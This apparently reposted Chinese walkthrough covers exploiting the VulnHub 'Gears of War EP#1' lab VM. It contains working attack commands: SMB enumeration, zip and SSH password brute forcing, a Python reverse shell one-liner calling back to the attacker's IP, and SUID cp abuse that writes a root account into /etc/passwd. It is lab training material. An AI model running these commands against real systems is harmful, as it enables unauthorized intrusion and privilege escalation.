下载地址:https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova
攻击者IP:192.168.56.141 桥接(自动) vmare
受害者IP:192.168.56.144 仅主机 wmbox
参考:https://mp.weixin.qq.com/s/Y__xzw4IBeli50Wq43r0VQ
https://www.freebuf.com/articles/web/344447.html
https://www.cnblogs.com/jason-huawen/p/17366393.html
https://blog.csdn.net/weixin_44288604/article/details/122641223
主机发现
arp-scan -I eth1 -l
端口扫描
80端口发现robots.txt,有几个html
源码中有些看起来没啥用的字母
139,145的smb服务
enum4linux -a 192.168.56.144
发现路径LOCUS_LAN$
$IPC
smbclient -L 192.168.56.144
也可以看到目录
enum4linux -a 192.168.56.144 | grep Local 枚举用户
nobodyrootmarcus
IPC$ 共享是一个特殊的共享,用于进程间通信和远程管理,不包含任何实际文件或目录。因此,当你尝试列出其内容时,会返回“对象名称未找到”的状态。
smbclient //192.168.56.144/LOCUS_LAN$
找到msg_horda.zip和SOS.txt
msg_horda.zip有密码
发现密码规则提示,@%%,(1个小写字母,两个数字,1个大写字母),
爆破zip密码1
爆破zip密码2
crunch 4 4 -t @%%, -o zip_passwd.txt
你提供的命令看起来像是用于密码破解工具 crunch 的命令。crunch 是一个密码生成工具,它可以根据用户定义的模式生成密码字典,常用于渗透测试和密码破解。下面是对你提供的命令的解释:crunch 4 4:这部分定义了生成的密码的最小和最大长度。在这个例子中,生成的密码长度将在4到4个字符之间。-t @%%:-t 选项用于指定密码生成的模板。在这个例子中,@ 表示一个字符(可以是任何字符),而 %% 表示两个数字。因此,这个模板将生成包含一个字符和两个数字的密码。-o zip_passwd.txt:-o 选项用于指定输出文件的名称。在这个例子中,生成的密码将被写入到名为 zip_passwd.txt 的文件中。综合起来,这个命令将生成所有长度为4个字符的密码,其中包含一个任意字符和两个数字,并将这些密码写入到 zip_passwd.txt 文件中
fcrackzip -D -u -v -p zip_passwd.txt msg_horda.zip
利用fcrackzip未破解出密码,猜测密码和[@%%,]有关,尝试了@%%,是错误的,@%%,貌似在crunch里用到过 利用crunch 4 4 -t @%%, -o dic.txt生成字典 % / / 代表数字 ^ / / 代表特殊符号 @ / / 代表小写字母 , / / 代表大写字母
你提供的命令是用于 fcrackzip 工具,这是一个专门用于破解 ZIP 文件密码的工具。下面是对你提供的命令的解释:fcrackzip -D -u -v -p zip_passwd.txt msg_horda.zip-D:这个选项告诉 fcrackzip 使用字典模式进行破解。这意味着它将使用提供的字典文件中的密码尝试解锁 ZIP 文件。-u:这个选项用于强制 fcrackzip 在找到正确密码后继续破解,直到尝试完所有密码。通常,一旦找到正确密码,fcrackzip 就会停止。-v:这个选项启用详细输出模式,fcrackzip 将显示更多关于破解过程的信息。-p zip_passwd.txt:这个选项指定用于破解的字典文件。在这个例子中,zip_passwd.txt 是一个包含密码列表的文件。msg_horda.zip:这是要破解密码的 ZIP 文件的名称。综合起来,这个命令将使用 zip_passwd.txt 文件中的密码列表尝试解锁 msg_horda.zip 文件,并在破解过程中提供详细输出。
爆破zip密码3
zip2john msg_horda.zip > pwd.hash
john --wordlist=zip_passwd.txt pwd.hash
提示3_d4y
一般用户名不大写
在Linux系统中,用户名通常是区分大小写的,这意味着你可以使用大写字母作为用户名的一部分。然而,大多数Linux发行版和系统管理员推荐使用小写字母作为用户名,以遵循标准的命名约定和最佳实践。以下是一些关于Linux用户名的一般规则:用户名通常以小写字母开头。用户名可以包含小写字母、数字、下划线(_)和连字符(-)。用户名不应包含空格或特殊字符(如@、#、$等)。用户名不应以数字开头。用户名不应太长,通常建议不超过32个字符。尽管可以使用大写字母,但在实际操作中,为了保持一致性和易读性,通常建议用户名只使用小写字母。此外,许多系统配置文件和脚本在处理用户名时可能假设用户名是小写的,因此使用大写字母可能会导致意外的问题。
nobodyrootmarcus
爆破ssh
hydra -L use.txt -p "3_d4y" 192.168.56.144 ssh
获得marcus/3_d4y
cd jail发现权限被拒
参考:https://cloud.tencent.com/developer/article/1680551
python反弹shell绕过
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.141",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
绕过成功
空的
suid提权
find / -user root -perm -4000 -print 2>/dev/null
发现cp
可以创建密码,然后写入/etc/passwd文件中去
admin/admin
openssl passwd -1 -salt admin admin
添加admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0:root:/bin/bash
开启临时http服务
python3 -m http.server 8080
拿到root
wget 192.168.56.141:8080/passwd
原文始发于微信公众号(王之暴龙战神):Gears of War_EP#1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论